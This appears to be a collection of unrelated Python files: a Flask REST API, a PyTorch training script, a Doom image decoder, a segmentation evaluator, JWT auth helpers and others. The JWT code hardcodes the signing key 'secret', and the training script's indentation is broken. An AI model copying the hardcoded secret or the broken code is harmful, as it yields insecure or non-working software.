                  34,
                  42
                ],
                "update_date": null
              }
            ]
        """
        """
        @api {get} /environments/:id Get a single environment
        @apiName get_environment
        @apiGroup Environments
        @apiVersion 1.0.0
        @apiPermission user
        @apiParam {Number} id (uri parameter) The environment's id.
        @apiSuccess {Number} id The environment's id.
        @apiSuccess {String} name The environment's name.
        @apiSuccess {Array} nodes The environment's nodes (by id)
        @apiSuccess {Datetime} insert_date The environment's inserted date
        @apiSuccess {Datetime} update_date The environment's updated date
        @apiSuccess {Datetime} delete_date The environment's deleted date
        @apiExample {curl} Example usage :
            curl -X GET -u user:pwd http://127.0.0.1:5000/api/v1/environments/1
        @apiSuccessExample {json} Success-Response:
            HTTP/1.0 200 OK
            {
              "delete_date": null,
              "id": 2,
              "insert_date": "2017-04-11T13:56:03+00:00",
              "name": "my_environment",
              "nodes": [
                1498,
                2817,
                2818
              ],
              "update_date": null
            }
        """
        # @get_item stores the fetched object(s) on flask's `g` as g.obj_info.
        # NOTE(review): `g` is not imported in this module's explicit imports —
        # presumably provided by `from app.decorators import *`; confirm.
        if not id:
            # Collection request: serialize the list of environments.
            return self.environments_schema.jsonify(g.obj_info)
        else:
            # Single-item request.
            return self.environment_schema.jsonify(g.obj_info)
    @auth.login_required
    @body_is_valid
    @is_unique_item(Environment)
    @post_item(Environment)
    def post(self):
        """
        @api {post} /environments Add a new environment
        @apiName add_environment
        @apiGroup Environments
        @apiVersion 1.0.0
        @apiPermission user
        @apiParam {String} name (json document) The environment's name.
        @apiSuccess {Number} id The environment's id.
        @apiExample {curl} Example usage :
            curl -X POST -H "Content-Type: application/json" \
            -d '{ "name": "my_new_environment" }' \
            http://127.0.0.1:5000/api/v1/environments
        @apiSuccessExample {json} Success-Response:
            HTTP/1.0 200 OK
            {
              "227": {
                "name": "my_new_environment"
              }
            }
        """
        # Creation is handled entirely by the @post_item decorator.
        pass
    @auth.login_required
    @body_is_valid
    @is_unique_item(Environment)
    @get_item(Environment)
    @edit_item(Environment)
    def put(self, id=None):
        """
        @api {put} /environments/:id Edit an existing environment
        @apiName edit_environment
        @apiGroup Environments
        @apiVersion 1.0.0
        @apiPermission user
        @apiParam {String} name (uri parameter) The environment's id
        @apiParam {String} name (json document) The new environment's name
        @apiSuccess {Number} success True if success
        @apiSuccess {Number} message A information message
        @apiExample {curl} Example usage :
            curl -X PUT -H "Content-Type: application/json" \
            -d '{ "name": "my_new_environment" }' \
            http://127.0.0.1:5000/api/v1/environments/:id
        @apiSuccessExample {json} Success-Response:
            HTTP/1.0 200 OK
            {
              "message": "successfully modified",
              "success": true
            }
        """
        # Update is handled entirely by the @edit_item decorator.
        pass
    @auth.login_required
    @get_item(Environment)
    @delete_item(Environment)
    def delete(self, id):
        """
        @api {delete} /environments/:id Delete a single environment
        @apiName rm_environment
        @apiGroup Environments
        @apiVersion 1.0.0
        @apiPermission user
        @apiParam {Number} id (uri parameter) The environment's id.
        @apiSuccess {Boolean} success Success (True if ok).
        @apiSuccess {String} message A success or error message.
        @apiExample {curl} Example usage :
            curl -X DELETE http://127.0.0.1:5000/api/v1/environments/:id
        @apiSuccessExample {json} Success-Response:
            HTTP/1.0 200 OK
            {
              "message": "<Environment 'my_new_environment'> deleted",
              "success": true
            }
        """
        # Deletion is handled entirely by the @delete_item decorator.
        pass
| 6,757 | 1,924 |
import numpy as np
from shapely.geometry import Point, LineString, Polygon
from smallest_enclosing_circle import make_circle
from itertools import groupby
from operator import itemgetter
# def human_feedback(x, human_cluster, point_cluster, obstacle):
# # human are inside the polygon
# score = 0
# index = set()
# nx = np.shape(x)[0]//2
#
# for num, polygon in human_cluster.items():
# point = []
# cluster = Polygon(polygon)
# for i in range(nx - 1):
# # whether the line segment crosses the cluster(polygon)
# if LineString([Point((x[i], x[i+nx])), Point(x[i+1], x[i+1+nx])]).intersects(cluster):
# point.append([(x[i], x[i+nx]), (x[i+1], x[i+1+nx])])
# index.add(i)
# index.add(i+1)
# if point:
# score += get_score_from_human(point, point_cluster[num])
# # obstacle avoidance
# for num, obs in obstacle.items():
# for i in range(nx - 1):
# # whether the line segment crosses the (obstacle)
# if LineString([Point((x[i], x[i + nx])), Point(x[i + 1], x[i + 1 + nx])]).intersects(obs):
# score += 1
# index.add(i)
# index.add(i+1)
# # the length of the trajectory
# dist = np.sum([np.linalg.norm([x[i] - x[i + 1], x[i + nx] - x[i + 1 + nx]]) for i in range(nx - 1)])
# score += dist
#
# # index
# index_group = []
# index = list(index)
# index.sort()
# for k, g in groupby(enumerate(index), lambda ix: ix[0] - ix[1]):
# index_group.append(list(map(itemgetter(1), g)))
# expand_index = set([j for i in index_group for j in i])
# for group in index_group:
# num = np.random.randint(0, 3)
# extra = [group[0]-k for k in range(1, num+1) if group[0]-k > 0] + \
# [group[-1]+k for k in range(1, num+1) if group[-1]+k < nx]
# expand_index.update(set(extra))
# return score, dist, list(expand_index)
#
#
# def get_score(point, polygon):
# """
# the distance of the center of polygon to the line segment of a trajectory
# :param point:
# :param polygon:
# :return:
# """
# rho = 1
# cx, cy, r = make_circle(polygon)
# score = 0
# for p in point:
# d = np.abs((p[1][1]-p[0][1])*cx - (p[1][0]-p[0][0])*cy + p[1][0]*p[0][1] - p[1][1]*p[0][0]) / \
# np.sqrt((p[1][1]-p[0][1])**2 + (p[1][0]-p[0][0])**2)
# score += rho/d[0]
# return score
#
#
# def get_score_from_human(point, point_cluster):
# score = 0
# radius = 0.5
# for human in point_cluster:
# cx = human[0]
# cy = human[1]
# for p in point:
# d = np.abs((p[1][1] - p[0][1]) * cx - (p[1][0] - p[0][0]) * cy + p[1][0] * p[0][1] - p[1][1] * p[0][0]) / \
# np.sqrt((p[1][1] - p[0][1]) ** 2 + (p[1][0] - p[0][0]) ** 2)
# if d <= radius:
# score += 1
# return score
def human_feedback1(x0, x, human, obstacle, human_scale):
    """Score a candidate trajectory against randomly standing humans.

    x0          -- reference flat trajectory, layout [x coords | y coords]
    x           -- candidate flat trajectory, same layout, length 2*nx
    human       -- iterable of (hx, hy) human positions
    obstacle    -- kept for interface compatibility (obstacle check disabled)
    human_scale -- per-human complaint radius

    Returns (score, complaint, dist, perturb_indices) where complaint is the
    number of (segment, human) proximity violations, dist is the deviation
    from the reference, and perturb_indices are the waypoints to re-sample.
    """
    complaints = 0
    flagged = set()
    nx = np.shape(x)[0] // 2
    # A waypoint pair (i, i+1) draws one complaint from human `ind` whenever
    # the segment between them passes within human_scale[ind] of that human.
    for i in range(nx - 1):
        ax, ay = x[i], x[i + nx]
        bx, by = x[i + 1], x[i + 1 + nx]
        for ind, h in enumerate(human):
            hx, hy = h[0], h[1]
            # Projection parameter of the human onto the segment; see
            # https://math.stackexchange.com/questions/2248617/shortest-distance-between-a-point-and-a-line-segment
            t = - ((ax - hx) * (bx - ax) + (ay - hy) * (by - ay)) / \
                ((bx - ax) ** 2 + (by - ay) ** 2)
            if 0 <= t <= 1:
                # Perpendicular foot lies on the segment: point-to-line distance.
                d = np.abs((by - ay) * hx - (bx - ax) * hy + bx * ay - by * ax) / \
                    np.sqrt((by - ay) ** 2 + (bx - ax) ** 2)
            else:
                # Otherwise the nearest point is one of the two endpoints.
                da = (ax - hx) ** 2 + (ay - hy) ** 2
                db = (bx - hx) ** 2 + (by - hy) ** 2
                d = np.sqrt(da) if da <= db else np.sqrt(db)
            if d <= human_scale[ind]:
                complaints += 1
                flagged.add(i)
                flagged.add(i + 1)
    # Obstacle crossing checks are currently disabled (see commented history above).
    complaint = complaints
    # Trajectory cost is only the deviation from the reference trajectory
    # (the path-length term is disabled).
    dist = 0 + np.linalg.norm(x - x0)
    score = complaints * 10 + dist
    # Group consecutive flagged indices into runs, then (optionally) widen
    # each run by a random margin before returning.
    runs = []
    for _, grp in groupby(enumerate(sorted(flagged)), lambda pair: pair[0] - pair[1]):
        runs.append([idx for _, idx in grp])
    expanded = {j for run in runs for j in run}
    for run in runs:
        width = np.random.randint(0, 1)  # high bound exclusive: always 0, widening disabled
        pads = [run[0] - k for k in range(1, width + 1) if run[0] - k > 0] + \
               [run[-1] + k for k in range(1, width + 1) if run[-1] + k < nx]
        expanded.update(pads)
    return score, complaint, dist, list(expanded)
| 5,675 | 2,226 |
#!/usr/bin/python
# coding=UTF-8
#
# METS Validator Portal
# Copyright (C) 2017
# All rights reserved.
#
# This code is distributed under the terms of the GNU General Public
# License, Version 3. See the text file "COPYING" for further details
# about the terms of this license.
class Path:
    """Holds the URL path configuration for the METS validator portal."""
    # URL path (class-level default: empty string).
    path = ""
def main():
    """Script entry point; currently a placeholder for test code."""
    # test code
    pass
# this means that if this script is executed, then
# main() will be executed
if __name__ == '__main__':
    main()
| 470 | 153 |
#!/usr/bin/env python
import torch.utils.data
import numpy as np
import random
import time
import matplotlib.pyplot as plt
from tkinter import _flatten
from function import plot_clas_loss, pre_processing
from sklearn.metrics import roc_auc_score
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import network as models
import math
import argparse
import pylib
# Set random seed on every RNG source (python, numpy, torch CPU/GPU) and force
# deterministic cuDNN kernels so runs are reproducible.
seed = 0
random.seed(seed)
np.random.seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.manual_seed(seed)
# CUDA
device_id = 0  # ID of GPU to use
cuda = torch.cuda.is_available()
if cuda:
    torch.cuda.set_device(device_id)
    torch.cuda.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
# Disable interactive matplotlib mode; figures are written to files only.
plt.ioff()
if __name__ == '__main__':
    # ------- command line configuration -------
    parser = argparse.ArgumentParser()
    parser.add_argument('--data_folder', type=str, default='data/')
    parser.add_argument('-l', '--dataset_file_list', nargs='+', help='<Required> Set flag', required=True, type=str)
    parser.add_argument('--train_num', type=int, default=2)
    parser.add_argument('--code_save', type=str, default='code_list.pkl')
    # NOTE(review): type=bool on argparse flags makes any non-empty string
    # (including "False") truthy — confirm these three flags behave as intended.
    parser.add_argument('--take_log', type=bool, default=False)
    parser.add_argument('--standardization', type=bool, default=False)
    parser.add_argument('--scaling', type=bool, default=False)
    parser.add_argument('--plots_dir', type=str, default='plots/')
    parser.add_argument('--code_dim', type=int, default=25)
    parser.add_argument('--batch_size', type=int, default=128, help='mini-batch size')
    parser.add_argument('--num_epochs', type=int, default=100, help='number of total iterations for training')
    parser.add_argument('--lr_step', type=int, default=10000, help='step decay of learning rates')
    parser.add_argument('--base_lr', type=float, default=1e-4, help='learning rate for network')
    parser.add_argument('--l2_decay', type=float, default=5e-5)
    parser.add_argument('--log_interval', type=int, default=100)
    config = parser.parse_args()
    #print(config)
    data_folder = config.data_folder
    code_save_file = data_folder + config.code_save
    dataset_file_list = [data_folder+f for f in config.dataset_file_list]
    data_num = len(dataset_file_list)
    train_num = config.train_num
    plots_dir = config.plots_dir
    # read data
    pre_process_paras = {'take_log': config.take_log, 'standardization': config.standardization, 'scaling': config.scaling}
    dataset_list = pre_processing(dataset_file_list, pre_process_paras)
    # training
    batch_size = config.batch_size
    num_epochs = config.num_epochs
    # NOTE(review): input width comes from the 'feature' key here, while the
    # batches below use 'mz_exp' — confirm both describe the same dimension.
    num_inputs = len(dataset_list[0]['feature'])
    code_dim = config.code_dim
    # construct a DataLoader for each dataset (keyed 1..N)
    batch_loader_dict = {}
    for i in range(len(dataset_list)):
        # Samples are stored column-wise; transpose to (samples, features).
        gene_exp = dataset_list[i]['mz_exp'].transpose()
        labels = dataset_list[i]['labels']
        # construct DataLoader list
        if cuda:
            torch_dataset = torch.utils.data.TensorDataset(
                torch.FloatTensor(gene_exp).cuda(), torch.LongTensor(labels).cuda())
        else:
            torch_dataset = torch.utils.data.TensorDataset(
                torch.FloatTensor(gene_exp), torch.LongTensor(labels))
        data_loader = torch.utils.data.DataLoader(torch_dataset, batch_size=batch_size,
                                                  shuffle=True, drop_last=True)
        batch_loader_dict[i+1] = data_loader
    # create model
    discriminator = models.Discriminator(num_inputs=num_inputs)
    if cuda:
        discriminator.cuda()
    log_interval = config.log_interval
    base_lr = config.base_lr
    lr_step = config.lr_step
    num_epochs = config.num_epochs
    l2_decay = config.l2_decay
    # training
    criterion = nn.CrossEntropyLoss()
    loss_classifier_list = []
for epoch in range(1, num_epochs + 1):
# step decay of learning rate
#learning_rate = base_lr / math.pow(2, math.floor(epoch / lr_step))
learning_rate = base_lr * math.pow(0.9, epoch / lr_step)
# regularization parameter between two losses
gamma_rate = 2 / (1 + math.exp(-10 * (epoch) / num_epochs)) - 1
if epoch % log_interval == 0:
print('{:}, Epoch {}, learning rate {:.3E}'.format(time.asctime(time.localtime()), epoch, learning_rate))
optimizer = torch.optim.Adam([
{'params': discriminator.parameters()},
], lr=learning_rate, weight_decay=l2_decay)
discriminator.train()
iter_data_dict = {}
for cls in batch_loader_dict:
iter_data = iter(batch_loader_dict[cls])
iter_data_dict[cls] = iter_data
# use the largest dataset to define an epoch
num_iter = 0
for cls in batch_loader_dict:
num_iter = max(num_iter, len(batch_loader_dict[cls]))
total_clas_loss = 0
num_batches = 0
for it in range(0, num_iter):
data_dict = {}
label_dict = {}
code_dict = {}
reconstruct_dict = {}
Disc_dict = {}
for cls in iter_data_dict:
data, labels = iter_data_dict[cls].next()
data_dict[cls] = data
label_dict[cls] = labels
if it % len(batch_loader_dict[cls]) == 0:
iter_data_dict[cls] = iter(batch_loader_dict[cls])
data_dict[cls] = Variable(data_dict[cls])
label_dict[cls] = Variable(label_dict[cls])
for cls in range(1,train_num+1):
Disc_dict[cls] = discriminator(data_dict[cls])
optimizer.zero_grad()
#Loss
# classifier loss for dignosis
loss_classification = torch.FloatTensor([0])
if cuda:
loss_classification = loss_classification.cuda()
for cat in range(1,train_num+1):
for cls in range(len(label_dict[cat])):
loss_classification += F.binary_cross_entropy(torch.squeeze(Disc_dict[cat])[cls], label_dict[cat][cls].float())
#loss_classification = criterion(Disc_dict[cat], label_dict[cat])
loss = loss_classification
loss.backward()
optimizer.step()
# update total loss
num_batches += 1
total_clas_loss += loss_classification.data.item()
avg_clas_loss = total_clas_loss / num_batches
if epoch % log_interval == 0:
print('Avg_classify_loss {:.3E}'.format(avg_clas_loss))
loss_classifier_list.append(avg_clas_loss)
#scheduler.step()
plot_clas_loss(loss_classifier_list, plots_dir+'clas_loss.png')
# testing: extract codes
discriminator.eval()
#F_score
def matric(cluster, labels):
TP, TN, FP, FN = 0, 0, 0, 0
n = len(labels)
for i in range(n):
if cluster[i]:
if labels[i]:
TP += 1
else:
FP += 1
elif labels[i]:
FN += 1
else:
TN += 1
return TP, TN, FP, FN
    #Accuracy: evaluate on every dataset after the training split.
    # NOTE(review): .cuda() is called unconditionally here (unlike training),
    # so this section requires a GPU — confirm, or guard with `cuda`.
    for pre in range(train_num,len(dataset_list)):
        test_data = torch.from_numpy(dataset_list[pre]['mz_exp'].transpose())
        test_label = torch.from_numpy((np.array(dataset_list[pre]['labels']))).cuda()
        Disc = discriminator(test_data.float().cuda())
        # Threshold the (sigmoid) discriminator output at 0.5.
        pred = torch.from_numpy(np.array([1 if i > 0.5 else 0 for i in Disc])).cuda()
        #pred = torch.max(F.softmax(Disc), 1)[1]
        num_correct = 0
        num_correct += torch.eq(pred, test_label).sum().float().item()
        Acc = num_correct/len(test_label)
        print("Accuracy is ", Acc)
        TP, TN, FP, FN = matric(pred, test_label)
        # NOTE(review): these divisions raise ZeroDivisionError when a class
        # is never predicted (TP+FP == 0) — confirm inputs make that impossible.
        precision = TP / (TP + FP)
        recall = TP / (TP + FN)
        f_score = 2 * precision * recall / (precision + recall)
        print("F_score is ",f_score)
        #AUC
        print("AUC is ",roc_auc_score(test_label.cpu(), pred.cpu()))
        #MCC (Matthews correlation coefficient)
        MCC = (TP * TN - FP * FN) / math.sqrt((TP + FP) * (TP + FN) * (TN + FP) * (TN + FN))
        print("MCC is ",MCC)
| 8,286 | 2,766 |
from piece import Piece
from .rook import Rook
from .bishop import Bishop
class Queen(Piece):
    """Queen piece: its movement is the union of a rook's and a bishop's."""
    def __init__(self, white):
        super().__init__(white)
        # Internal helper pieces of the same colour provide the two movement rules.
        self.rook = Rook(white)
        self.bishop = Bishop(white)
    def can_move(self, board, start, end) -> bool:
        """
        Determines if queen can currently move to marked position
        """
        rook_ok = self.rook.can_move(board, start, end)
        bishop_ok = self.bishop.can_move(board, start, end)
        if not (rook_ok or bishop_ok):
            return False
        return True
    def controlled_squares(self, board, x, y) -> list:
        """Squares attacked from (x, y): rook squares followed by bishop squares."""
        return (self.rook.controlled_squares(board, x, y)
                + self.bishop.controlled_squares(board, x, y))
    def legal_moves(self, board, x, y) -> list:
        """Legal destinations from (x, y): rook moves followed by bishop moves."""
        return (self.rook.legal_moves(board, x, y)
                + self.bishop.legal_moves(board, x, y))
| 966 | 314 |
from struct import Struct
from typing import Optional
from PIL import Image
from doom.palette import Palette
class DoomImage(object):
S_HEADER: Struct = Struct('<HHhh')
def __init__(self, width: int, height: int, left: int, top: int):
self.width: int = width
self.height: int = height
self.left: int = left
self.top: int = top
self.pixels: Optional[bytes] = None
@classmethod
def from_data(cls, data: bytes, palette: Palette):
"""
Creates a DoomImage with doom graphics data rendered to an internal buffer.
:param data:
:param palette:
:return:
"""
width, height, left, top = DoomImage.S_HEADER.unpack_from(data)
data_len = len(data)
# Attempt to detect invalid data.
if width > 2048 or height > 2048 or top > 2048 or left > 2048:
return None
if width <= 0 or height <= 0:
return None
image = cls(width, height, left, top)
# Initialize an empty bitmap.
pixels = bytearray([0, 0, 0] * width * height)
pixels_len = len(pixels)
# Read column offsets.
offset_struct = Struct('<' + ('I' * width))
offsets = offset_struct.unpack_from(data[8:8 + (width * 4)])
# Read columns.
column_index = 0
while column_index < width:
offset = offsets[column_index]
# Attempt to detect invalid data.
if offset >= data_len:
return None
prev_delta = 0
while True:
column_top = data[offset]
# Column end.
if column_top == 255:
break
# Tall columns are extended.
if column_top <= prev_delta:
column_top += prev_delta
prev_delta = column_top
pixel_count = data[offset + 1]
offset += 3
pixel_index = 0
while pixel_index < pixel_count:
if offset + pixel_index >= data_len:
break
pixel = data[offset + pixel_index]
destination = ((pixel_index + column_top) * width + column_index) * 3
if destination + 2 < pixels_len:
pixels[destination + 0] = palette.colors[pixel].r
pixels[destination + 1] = palette.colors[pixel].g
pixels[destination + 2] = palette.colors[pixel].b
pixel_index += 1
offset += pixel_count + 1
if offset >= data_len:
break
column_index += 1
image.pixels = bytes(pixels)
return image
@staticmethod
def is_valid(data: bytes) -> bool:
"""
Determine if some data is likely to be a valid Doom type image.
:param data:
:return:
"""
if len(data) < 16:
return False
# Verify if the header values are sane.
width, height, left, top = DoomImage.S_HEADER.unpack_from(data)
if width > 2048 or height > 2048 or top > 2048 or left > 2048:
return False
if width <= 0 or height <= 0:
return False
# Verify that offsets are in range of the data.
offset_struct = Struct('<' + ('I' * width))
offsets = offset_struct.unpack_from(data[8:8 + (width * 4)])
for offset in offsets:
if offset >= len(data):
return False
return True
    def get_pillow_image(self) -> Image:
        """
        Returns a Pillow image from this graphic's image data.

        Builds an RGB image directly from the raw ``self.pixels`` byte
        buffer (3 bytes per pixel, row-major), sized ``self.width`` by
        ``self.height``.

        :return: a new PIL ``Image`` in RGB mode.
        """
        return Image.frombytes('RGB', (self.width, self.height), self.pixels)
| 3,842 | 1,116 |
import argparse
import boundary_utils as bu
import numpy as np
import os
import sys
import time
from utils import *
from multiprocessing import Pool
import pickle as pk
from PIL import Image
def parse_args():
    """Parse command-line options for the evaluation script.

    Recognised flags:
      -d / --data-dir : root directory of the ground-truth dataset (default None)
      -p / --pred-dir : root directory of the prediction outputs (default None)
    """
    description = 'Evaluate drivable area and semantic segmentation predictions'
    parser = argparse.ArgumentParser(description=description)
    for short_flag, long_flag in (('-d', '--data-dir'), ('-p', '--pred-dir')):
        parser.add_argument(short_flag, long_flag, default=None)
    return parser.parse_args()
def _eval_drivable(infos):
    """Worker: compute the drivable-area confusion matrix for one image.

    :param infos: ``(gt_fn, pred_fn)`` pair -- path to the ground-truth PNG
        and path to the predicted ``.npy`` label map.
    :return: a single-element list holding the 3x3 histogram (3 classes),
        matching the nesting that main() unpacks.
    """
    # Removed the dead ``global task`` declaration: ``task`` is never
    # defined or read anywhere in this module.
    gt_fn, pred_fn = infos
    gt = np.array(Image.open(gt_fn))
    pred = np.load(pred_fn)
    # fast_hist (from utils) accumulates a confusion matrix over the
    # flattened prediction/ground-truth label arrays.
    drivable_hist = fast_hist(pred.flatten(), gt.flatten(), 3)
    return [drivable_hist]
def _eval_sem_seg(infos):
    """Worker: compute the 19-class semantic-segmentation confusion matrix
    for one image.

    :param infos: ``(gt_fn, pred_fn)`` pair -- ground-truth PNG path and
        predicted ``.npy`` path (prediction stored with a leading batch axis).
    :return: the 19x19 histogram array.
    """
    # Removed the dead ``global task`` declaration: ``task`` is never
    # defined or read anywhere in this module.
    gt_fn, pred_fn = infos
    gt = np.array(Image.open(gt_fn))
    # Drop the leading batch dimension and match the uint8 label dtype.
    pred = np.load(pred_fn).squeeze(0).astype(np.uint8)
    # semantic segmentation
    hist = fast_hist(pred.flatten(), gt.flatten(), 19)
    return hist
def main():
    """Evaluate whichever tasks ('sem_seg', 'drivable') have prediction
    subdirectories under --pred-dir, printing per-class IoU tables.

    Work is fanned out over a multiprocessing Pool; progress is estimated
    by polling the pool iterator.
    """
    args = parse_args()
    # Each subdirectory of the prediction dir names a task to evaluate.
    tasks = os.listdir(args.pred_dir)
    # segmentation
    if 'sem_seg' in tasks:
        print('Evaluating semantic segmentation...')
        sem_seg_base = os.path.join(args.data_dir, 'images', '10k', 'val')
        # Ground-truth label maps: '<stem>_train_id.png' per validation image.
        gt_fns = [os.path.join(args.data_dir, 'labels', 'sem_seg', 'sem_seg_val', fn[:-4] + '_train_id.png') for fn in os.listdir(sem_seg_base)]
        sem_seg_fns = [os.path.join(args.pred_dir, 'sem_seg', '{}.npy'.format(fn[:-4])) for fn in os.listdir(sem_seg_base)]
        pool = Pool(5)
        o = pool.imap_unordered(_eval_sem_seg, zip(gt_fns, sem_seg_fns))
        tic = time.time()
        # NOTE(review): ``o._items`` is a private attribute of the pool's
        # IMapUnorderedIterator (a deque of finished (index, result) pairs);
        # this polling loop depends on a CPython implementation detail and
        # could break across Python versions -- confirm.
        while len(o._items) < len(gt_fns):
            toc = time.time()
            finished = len(o._items)
            if finished > 0:
                # Linear ETA extrapolation from throughput so far.
                print('{}/{} ETA: {}s Elapsed: {}s'.format(finished, len(gt_fns), (len(gt_fns) - finished) / finished * (toc - tic), toc - tic), end='\r')
            time.sleep(10)
        pool.close()
        pool.join()
        # Each _items entry is an (index, result) pair; keep the result.
        evals = [i[1] for i in o._items]
        # Sum per-image confusion matrices, then derive per-class IoU.
        hist = np.sum(evals, axis=0)
        ious = per_class_iu(hist).tolist()
        classes = ['road', 'sidewalk', 'building', 'wall', 'fence', 'pole', 'traffic light', 'traffic sign', 'vegetation', 'terrain', 'sky', 'person', 'rider', 'car', 'truck', 'bus', 'train', 'motorcycle', 'bicycle', 'TOTAL']
        # The appended entry is the mean IoU, paired with the 'TOTAL' label.
        ious.append(np.nanmean(ious))
        print('[SEMANTIC]')
        [print(a, '\t\t', b) for a, b in zip(classes, ious)]
        print(','.join([str(i) for i in ious]))
    # drivable area
    if 'drivable' in tasks:
        print('Evaluating drivable...')
        drivable_base = os.path.join(args.data_dir, 'labels', 'drivable', 'drivable_val')
        gt_fns = sorted([os.path.join(drivable_base, d) for d in os.listdir(drivable_base)])
        pred_drivable_base = os.path.join(args.pred_dir, 'drivable')
        # Match each ground-truth file to a prediction by bare file stem.
        drivable_fns = [os.path.join(pred_drivable_base, '{}.npy'.format(n.split('.')[0].split('/')[-1])) for n in gt_fns]
        pool = Pool(10)
        print(len(gt_fns), len(drivable_fns))
        o = pool.imap_unordered(_eval_drivable, zip(gt_fns, drivable_fns))
        tic = time.time()
        # Same private-attribute polling pattern as above.
        while len(o._items) < len(gt_fns):
            toc = time.time()
            finished = len(o._items)
            if finished > 0:
                print('{}/{} ETA: {}s Elapsed: {}s'.format(finished, len(gt_fns), (len(gt_fns) - finished) / finished * (toc - tic), toc - tic), end='\r')
            time.sleep(10)
        pool.close()
        pool.join()
        drivable_evals = [i[1] for i in o._items]
        # if len(drivable_evals[0][0]) == 9:
        # lane_evals = np.mean([i[0] for i in drivable_evals], axis=0)
        # print('[LANE]\n[thresh=10] {} {} {}\n[thresh=5] {} {} {}\n[thresh=1] {} {} {}'.format(*lane_evals))
        # for e in lane_evals:
        # print(e)
        drivable_hist = np.sum(drivable_evals, axis=0)
        drivable_ious = per_class_iu(drivable_hist[0]).tolist()
        # Overall = mean of the two non-background classes (direct, alternative).
        drivable_ious.append(sum(drivable_ious[1:])/2)
        print('[DRIVABLE]\n[direct] {} [alt] {} [overall] {}'.format(*drivable_ious[1:]))
        for d in drivable_ious:
            print(d)
# Script entry point: run the evaluation when executed directly.
if __name__ == '__main__':
    main()
| 4,327 | 1,675 |
import jwt
from flask import request, jsonify
from datetime import datetime
from dateutil.relativedelta import relativedelta
from functools import wraps
from jungle_book.user.models import User
# Signing algorithm and shared secret for all tokens issued by this module.
algorithm = "HS256"
key = "secret" # TODO put this into env variables
# NOTE(review): these timestamps are evaluated once, at import time. Every
# token issued by a long-running process therefore shares the same iat/exp
# values -- presumably unintended; confirm and compute per call if so.
NOW = datetime.now()
SIX_MONTHS_LATER = NOW + relativedelta(months=+6)
def encode_jwt(payload):
    """Encode JWT token with HS256 hashing algorithm.

    The issued-at and expiry claims are computed at call time. (The
    module-level NOW/SIX_MONTHS_LATER constants are frozen at import
    time, which made every token from a long-running process carry the
    same iat/exp -- that was a bug.)

    :param payload: dict of claims; mutated in place to add iat/exp.
    :return: the encoded token as a str.
    """
    now = datetime.now()
    payload.update({
        "exp": now + relativedelta(months=+6),
        "iat": now
    })
    token = jwt.encode(
        payload=payload,
        key=key,
        algorithm=algorithm
    ).decode('utf-8')  # PyJWT 1.x returns bytes; .decode keeps the str contract
    return token
def decode_jwt(token):
    """Decode a JWT and return its claims.

    Pins the accepted algorithm list to the module's configured algorithm:
    leaving ``algorithms`` unset permits algorithm-confusion attacks, and
    PyJWT >= 2 requires it to be explicit.

    :param token: encoded JWT string.
    :return: dict of decoded claims.
    :raises jwt.InvalidTokenError: if the token is malformed, expired, or
        has a bad signature.
    """
    decoded_token = jwt.decode(jwt=token, key=key, algorithms=[algorithm])
    return decoded_token
def validate_jwt(token):
    """Return True if the given JWT is well-formed, correctly signed and
    unexpired; False otherwise.

    Catches ``jwt.InvalidTokenError`` (the base of ExpiredSignatureError,
    DecodeError, etc.) so that a malformed token yields False instead of
    propagating an exception -- the original only caught expiry. Also pins
    ``algorithms`` like decode_jwt, for the same security reason.
    """
    try:
        jwt.decode(jwt=token, key=key, algorithms=[algorithm])
    except jwt.InvalidTokenError:
        return False
    return True
def extend_jwt(token):
    """Issue a fresh JWT carrying the claims of *token*.

    If *token* fails validation, an error message string is returned
    instead of a new token.
    """
    if not validate_jwt(token):
        return "Provided token is invalid."
    return encode_jwt(decode_jwt(token))
def token_required(f):
    """Flask view decorator that requires a valid JWT in the
    'x-access-token' request header.

    On success the authenticated User (looked up by the token's 'id'
    claim) is passed to the wrapped view as its first argument. Missing
    or undecodable tokens short-circuit with a 401 JSON response.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        token = None
        # Token travels in a custom header rather than Authorization.
        if 'x-access-token' in request.headers:
            token = request.headers['x-access-token']
        if not token:
            return jsonify({'message': 'Token is missing'}), 401
        try:
            data = decode_jwt(token)
            # NOTE(review): only DecodeError is caught here; an expired
            # token would raise ExpiredSignatureError and escape this
            # handler -- confirm whether that is intended.
            user = User.query.filter_by(id=data['id']).first()
        except jwt.exceptions.DecodeError:
            return jsonify({'message': 'Token is invalid!'}), 401
        return f(user, *args, **kwargs)
    return decorated
| 1,795 | 588 |
#
# PySNMP MIB module REMOTE-LOGIN-TRAP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/REMOTE-LOGIN-TRAP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:47:32 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# Machine-generated pysmi output: ``mibBuilder`` is not defined here --
# presumably it is injected into this module's namespace by the PySNMP
# MIB loader when the module is executed (standard for compiled MIBs).
# Pull in the base ASN.1 / SMI symbol definitions this MIB builds upon.
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint")
# Objects carried by the trap, imported from the vendor agent MIB.
s5AgRemoteLoginIp, s5AgRemoteLoginStatus = mibBuilder.importSymbols("S5-AGENT-MIB", "s5AgRemoteLoginIp", "s5AgRemoteLoginStatus")
remoteLoginTrap, = mibBuilder.importSymbols("S5-ROOT-MIB", "remoteLoginTrap")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
